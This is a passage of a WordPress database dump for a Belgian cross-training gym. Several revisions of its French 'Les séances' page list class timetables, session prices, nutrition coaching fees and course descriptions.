padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:38:00', '2013-07-03 17:38:00', '', 11, 'http://www.crosstrainingcenter.be/?p=189', 0, 'revision', '', 0),
(188, 1, '2013-07-03 17:35:03', '2013-07-03 17:35:03', '<h2>Team Training :</h2>\r\n<h4>En semaine :</h4>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4>Le week-end :</h4>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td></td>\r\n<td>LUNDI</td>\r\n<td>MARDI</td>\r\n<td>MERCREDI</td>\r\n<td>JEUDI</td>\r\n<td>VENDREDI</td>\r\n</tr>\r\n<tr>\r\n<td>17h30</td>\r\n<td>TRX</td>\r\n<td>CARDIO</td>\r\n<td>RIP-KETTLE</td>\r\n<td>GLFE</td>\r\n<td>TRX</td>\r\n</tr>\r\n<tr>\r\n<td>18h15</td>\r\n<td>GLFE</td>\r\n<td>TRX</td>\r\n<td>CARDIO</td>\r\n<td>RIP-KETTLE</td>\r\n<td>GLFE</td>\r\n</tr>\r\n<tr>\r\n<td>19h00</td>\r\n<td>RIP-KETTLE</td>\r\n<td>GLFE</td>\r\n<td>TRX</td>\r\n<td>CARDIO</td>\r\n<td>RIP-KETTLE</td>\r\n</tr>\r\n<tr>\r\n<td>19h45</td>\r\n<td>CARDIO</td>\r\n<td>RIP-KETTLE</td>\r\n<td>GLFE</td>\r\n<td>TRX</td>\r\n<td>CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:35:03', '2013-07-03 17:35:03', '', 11, 'http://www.crosstrainingcenter.be/?p=188', 0, 'revision', '', 0),
(190, 1, '2013-07-03 17:38:41', '2013-07-03 17:38:41', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:38:41', '2013-07-03 17:38:41', '', 11, 'http://www.crosstrainingcenter.be/?p=190', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(191, 1, '2013-07-03 17:39:35', '2013-07-03 17:39:35', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 25%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 